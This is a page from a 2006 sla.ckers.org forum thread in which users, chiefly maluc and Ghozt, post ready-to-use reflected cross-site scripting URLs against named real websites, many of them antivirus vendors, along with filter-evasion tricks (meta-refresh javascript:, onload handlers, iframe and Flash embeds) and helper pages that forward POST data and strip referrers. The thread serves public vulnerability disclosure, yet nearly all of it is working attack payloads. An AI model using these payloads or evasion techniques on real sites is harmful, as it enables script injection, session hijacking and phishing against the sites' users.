Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...89101112131415161718...LastNext
Current Page: 13 of 65
Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:56PM

http://livesupport.bitdefender.ro/request.php?l=admin&x=1&deptid=1&page=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx=%20

-maluc



Edited 1 time(s). Last edit at 09/29/2006 10:57PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:02PM

http://support.drweb.com/support_request/?name2=user&topic=registration&keynum=none&first=-&name1=XSS+is+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&email=XSS+here+too%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&question=And+here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&submit=Send

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:15PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.norman.com/News/Subscriptions/18805/en-us&lime_uniqueIdentifier=1&Service=all_mailinglists&Form=frmHome&CWDSerialNumber=&StateVar1=Default&StateVar2=0&dfsEmail=XSS%20is%20here%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx%20&pbFetch=Fetch+Info&dfsName=XSS%20here%20too%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx%20&cmbGeneral_Language= norman.com - yet another antivirus vendor

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:23PM

http://www.sophos.com/products/sb/sbs/eval/?field_platforms=1&field_forename=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&field_surname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E%3Cx+&field_company=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&field_job_title=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E%3Cx+&field_phone_number=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3C%2Fscript%3E%3Cx+&field_email=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS5%22%29%3C%2Fscript%3E%3Cx+&field_address=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS6%22%29%3C%2Fscript%3E%3Cx+&field_address_2=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS7%22%29%3C%2Fscript%3E%3Cx+&field_city=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS8%22%29%3C%2Fscript%3E%3Cx+&field_zip_postal=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS9%22%29%3C%2Fscript%3E%3Cx+&field_country=choose&field_region=XSS+here%22%3E%3Cscript%3Ealert%28%22XSSA%22%29%3C%2Fscript%3E%3Cx+&field_region_list_9=choose&field_region_list_32=choose&field_region_list_183=choose&field_company_size=choose&field_number_users=choose&field_market_sector=choose&submit.x=0&submit.y=0&submit=Submit&lp_keyword=&sid=&path=&field_product=Sophos+Small+Business+Suite&field_lead_id=&field_prom_id=&referer=&main_form=1

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 11:40PM

I'm not sure how to put this into a string even for xss_post_forwarder, but the site is https://www.astalavista.net/?cmd=adv&act=login and ">';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} goes in the email field.

https://www.astalavista.net/?cmd=sup&act=pwd Is also vulnerable.



Edited 1 time(s). Last edit at 09/29/2006 11:41PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 12:00AM

https://shop.pandasoftware.com/entrada.aspx?idioma=en-us&returnUrl=%22);%7D%7D%20alert(%22XSS%22);%7B%7Bx=eval(%22

this.. was quite tricky to insert without breaking the script. everything there is the minimum

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 12:54AM

previously disclosed by Ghozt, just click friendly:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3fcmd=adv%26act=dologin&frmAdvLogin_EMail=XSS+is+here%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&frmAdvLogin_PW= astalavista.net

and i'm unable to add the second one.. because whiteacid's script won't allow it.. it seems to be because the strings 'cmd' and 'pwd' are in the URL .. why? no clue.

but here it is anyway: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3fcmd=sup%26act=pwd&frmPwd_type=mem&frmPwd_address=XSS+here+too%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20

and you're right that those were tricky to turn into a URL..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:00AM

http://www.guestcity.com/cgi-bin/view.fcgi?book=XSSman%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx
http://snarf-it.org/?show=search&query=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+



Edited 2 time(s). Last edit at 09/30/2006 01:14AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:15AM

http://thepiratebay.org/search.php?q=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+
http://torrentreactor.net/search.php?search=&words=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+



Edited 1 time(s). Last edit at 09/30/2006 01:16AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:55AM

https://www.scientology.org/html/std/portal/login/cosRegistration1Submitter.jsp?csDomain=scientology&csSiteId=scientology&csLocale=en_US&csFolder=portal/login&firstName=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx%20%26lastName%3D%22%29%3Balert%28%22XSS%22%29%3C/script%3E%3Cx%26emailAddress%3Dnull%2540none.org%26iasNumber%3D1111111111111111%26userId%3Duserme%26userPassword%3Daaaaaa%26userPassword2%3Daaaaaa



Edited 5 time(s). Last edit at 09/30/2006 02:07AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 02:30AM

http://www.rav.ro/pages/search.php?q=XSS+here%27%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&submit=Go

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 02:31AM

http://www.quickheal.co.in/site_search.asp?search=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&submit=Search+%3E%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 03:08AM

was tricky to find one on this site, filtered most everything.

http://www.grisoft.com/doc/asdf%22%3E%3Cbody%20onload=alert('XSS')%3E%3Cx%20/lng/us/tpl/tpl01

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 30, 2006 06:53AM

maluc, I have no idea why that doesn't work, presumably something my host has in place which I can't change. the source code is available for my script (.phps file) so people can look there, but I doubt you'll find anything.

Otherwise... good finds.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 30, 2006 01:34PM

oh good, I get to give netcmd shit over one of these ;0

-id

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 02:29PM

http://www.phazeddl.com/search.php?q=%22/%3E%3Ciframe%20src%3Dhttp%3A//google.com%20
The best I can do is an iframe, the filters are hard. ha.ckers.org/scriptlet.html works but the alerts are opened in ha.ckers.org so it's useless.



Edited 3 time(s). Last edit at 09/30/2006 02:56PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 30, 2006 04:20PM

Not for CSRF or redirection. ;) Don't worry about it Ghozt, it's still a valuable piece of information!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:22PM

https://tools.sonic.net/phplive/request.php?l=administrator&x=1&page=%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E%3Cx

they apparently passed the 'hackers safe' test

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:26PM

swedish version of youtube.. http://bubblare.se/search.jsp?query=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:30PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.authentium.com/support/password/RegistrationMod.asp&txtSerial=a%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&txtreseller=&cboMonth=9&cboDay=30&cboYear=2006&txtUserName=&txtPassword=&txtVerifyPassword=&txtHint= authentium.com .. another antivirus company i found on this list http://blog.washingtonpost.com/securityfix/2005/12/ranking_response_times_for_ant.html

didn't finish them all before falling asleep last night ..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:38PM

http://alerts.f-prot.com/cgi-bin/alerts_subscribe.pl?name=XSS%20here%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&email=&action=confirm&lang=en&step=step_1&next=step_2&submit=%A0%A0%A0%A0Submit%A0%3E%3E%A0%A0%A0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:45PM

http://www.trendmicro.com/download/trial/thankyou.asp?Name=XSSman%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&id=Trend%20Micro%20Anti-Spyware%20Enterprise%20Edition&productid=68

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:50PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.ikarus-software.at/portal/modules.php?name=Search&query=XSS+holes%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cz+&topic=&category=0&author=&days=0&type=stories ikarus-software.at - another antivirus company i've never heard of

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 30, 2006 05:56PM

Ghozt Wrote:
-------------------------------------------------------
> http://www.phazeddl.com/search.php?q=%22/%3E%3Cifr
> ame%20src%3Dhttp%3A//google.com%20
> The best I can do is an iframe, the filters are
> hard. ha.ckers.org/scriptlet.html works but the
> alerts are opened in ha.ckers.org so it's useless.


How about flash? http://www.phazeddl.com/search.php?q=%3C/title%3E%3Cembed%20src=http://www.flashflashrevolution.com/SpinItUp86-60fps-vis.swf%3E

Also, this brings up something, rsnake, care to make an "alert.swf"?
name should be self-explanatory. :P

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:57PM

http://www.asw.cz/i_kat_207.php?lang=LeetSpeek%22><script>alert(String.fromCharCode(88,83,83))</script><x%20
http://www.avast.com/i_kat_207.php?lang=LeetSpeek%22><script>alert(String.fromCharCode(88,83,83))</script><x%20

same website, same hole, just different domain

-maluc



Edited 1 time(s). Last edit at 09/30/2006 06:07PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:06PM

since its in the <head>,

</title><meta blah> works well..

http://www.phazeddl.com/search.php?q=%3C/title%3E%3CMETA%20HTTP-EQUIV=refresh%20CONTENT=0;url=javascript:alert(String.fromCharCode(88,83,83));%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:25PM

http://scripts.sitesled.com/metaredir.html?http://www.ca.com/cgi-bin/template_form.cgi?subject=CA+Product+Information+Request&recipient=myetrustclientadvocate%40ca.com&mail_from_email=y&title=CA+Product+Information+Request&required=Country%2COrganizer%2CInterested%2CName%2Cemail%2CState_or_Province%2CZip_or_Postal_Code&field_alias=Country%3DCountry%2COrganizer%3DI+am+a%2CInterested%3DInterested+In%2CName%3DName%2CTitle%3DTitle%2CPhoneAreaCode%3DPhone+Area+Code%2CPhoneExchange%3DPhone+Exchange%2CPhoneConvert%3DPhone+Convert%2CPhoneExt%3DPhone+Extension%2CFax%3DFax%2Cemail%3DEmail+Address%2CCompany%3DCompany+Name%2CAddress%3DAddress%2CAddress2%3DAddress2%2CCity%3DCity%2CState_or_Province%3DState+or+Province%2CZip_or_Postal_Code%3DZip+or+Postal+Code%2CQuestion%3DQuestions+or+comments%2CCall%3DWould+you+like+someone+to+call+you%2CTime_to_Call%3Dwhat+time+%28your+local+time%29+is+most+convenient+for+you&sort=order%3Adate%2Ctime%2CCountry%2COrganizer%2CInterested%2CName%2CTitle%2CPhoneAreaCode%2CPhoneExchange%2CPhoneConvert%2CPhoneExt%2CFax%2Cemail%2CCompany%2CAddress%2CAddress2%2CCity%2CState_or_Province%2CZip_or_Postal_Code%2CQuestion%2CCall%2CTime_to_Call&env_report=REMOTE_HOST%2CHTTP_USER_AGENT&bgcolor=%23FFFFFF&return_link_title=CA+Home+Page&print_blank_fields=1&return_link_url=%2F&print_config=email%2Csubject&filesave=product_info_request.txt&filesave_type=text-delimited&filesave_section=%2F&filesave_delimiter=pipe&Country=United+States&Organizer=Home+User&Interested=eTrust+EZ+Antivirus&Name=XSSman%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E&Title=XSSman%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&PhoneAreaCode=XSSman%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&PhoneExchange=XSSman%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&PhoneConvert=XSSman%3Cscript%3Ealert%28%22XSS4%22%29%3C%2Fscript%3E&PhoneExt=XSSman%3Cscript%3Ealert%28%22XSS5%22%29%3C%2Fscript%3E&Fax=XSSman%3Cscript%3Ealert%28%22XSS6%22%29%3C%2Fscript%3E&email=XSSman%3Cscript%3Ealert%28%22XSS7%22%29%3C%2Fscript%3E%40intar.net&Company=XSSman%3Cscript%3Ealert%28%22XSS8%22%29%3C%2Fscript%3E&Address=XSSman%3Cscript%3Ealert%28%22XSS9%22%29%3C%2Fscript%3E&Address2=XSSman%3Cscript%3Ealert%28%22XSSA%22%29%3C%2Fscript%3E&City=XSSman%3Cscript%3Ealert%28%22XSSB%22%29%3C%2Fscript%3E&State_or_Province=XSSman%3Cscript%3Ealert%28%22XSSC%22%29%3C%2Fscript%3E&Zip_or_Postal_Code=XSSman%3Cscript%3Ealert%28%22XSSD%22%29%3C%2Fscript%3E&Question=XSSman%3Cscript%3Ealert%28%22XSSE%22%29%3C%2Fscript%3E&Time_to_Call=XSSman%3Cscript%3Ealert%28%22XSSF%22%29%3C%2Fscript%3E <--ca.com there's 16 different alerts, just to warn you

-maluc



Edited 3 time(s). Last edit at 09/30/2006 08:21PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:30PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.virusbuster.hu/en/newsletter/admin/&type_alert=1&type_security=1&type_news=1&type_products=1&email=XSS%20here%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&newsletter.x=0&newsletter.y=0&newsletter_submitted=1&nletter_email_submit=1 virusbuster.hu

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 30, 2006 06:34PM

maluc Wrote:
-------------------------------------------------------
> http://www.ca.com/ there's 16 different alerts,
> just to warn you
>
> -maluc


For the record,

Error: http://sla.ckers.org/forum/read.php?3,44,page=13 is not allowed access to this program.
This form cannot complete!

Needs to be copypasta'd

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:55PM

ah, your right.. the referrer has to be cleared first.. so i wrote a simple page that meta redirects to it, which clears the referrer. It's general purpose, but let me know if it's buggy

Usage: http://scripts.sitesled.com/metaredir.html?http://asdf.com h ttp://scripts.sitesled.com/metaredir.html?h ttp://asdf.com (without the spaces, obviously)

Edit: changed the subdomain
-maluc



Edited 1 time(s). Last edit at 09/30/2006 08:22PM by maluc.

Options: ReplyQuote
Pages: PreviousFirst...89101112131415161718...LastNext
Current Page: 13 of 65


Sorry, only registered users may post in this forum.